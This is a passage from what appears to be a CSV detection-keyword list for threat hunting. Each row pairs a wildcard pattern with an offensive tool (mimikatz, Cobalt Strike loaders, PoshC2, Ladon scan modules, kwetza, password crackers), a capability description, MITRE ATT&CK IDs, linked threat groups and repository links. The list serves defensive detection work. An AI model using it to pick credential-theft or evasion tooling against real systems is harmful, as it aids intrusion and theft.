pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kuhl_m_sekurlsa_packages.h*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kuhl_m_sekurlsa_utils.c*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kuhl_m_sekurlsa_utils.h*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kwallet2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*kwetza*,offensive_tool_keyword,kwetza,Kwetza infects an existing Android application with either custom or default payload templates to avoid detection by antivirus. 
Kwetza allows you to infect Android applications using the target applications default permissions or inject additional permissions to gain additional functionality.,T1402 - T1027 - T1059.001 - T1574.002 - T1583.001 - T1588.002,TA0001 - TA0004 - TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/sensepost/kwetza,1,0,N/A,N/A,7,604,256,2023-07-21T16:30:40Z,2016-09-22T14:39:10Z -*kyleavery/AceLdr*,offensive_tool_keyword,cobaltstrike,Cobalt Strike UDRL for memory scanner evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/AceLdr,1,1,N/A,10,10,712,123,2023-09-28T19:47:03Z,2022-08-11T00:06:09Z -*kyleavery/inject-assembly*,offensive_tool_keyword,cobaltstrike,Inject .NET assemblies into an existing process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/inject-assembly,1,1,N/A,10,10,449,75,2022-01-19T19:15:11Z,2022-01-03T15:38:10Z -*L0phtCrack*,offensive_tool_keyword,L0phtCrack,L0phtCrack attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows workstations. networked servers. primary domain controllers. or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary. brute force. etc). LC5 was discontinued by Symantec in 2006. then re-acquired by the original L0pht guys and reborn as LC6 in 2009. For free alternatives. consider ophcrack. Cain and Abel. or John the Ripper. For downloads and more information. 
visit the L0phtCrack homepage.,T1003 - T1110 - T1212 - T1552 - T1609,TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Credential Access,http://www.l0phtcrack.com/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*label-implant *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Ladon * AllScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon * CiscoScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon * OnlineIP*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon * OnlinePC*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon * OsScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon * OxidScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon *.txt *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon *DeBase64*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon *FtpScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon *LdapScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon *SMBGhost*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon *SmbHashScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon *SmbScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon *SshScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon *TomcatScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
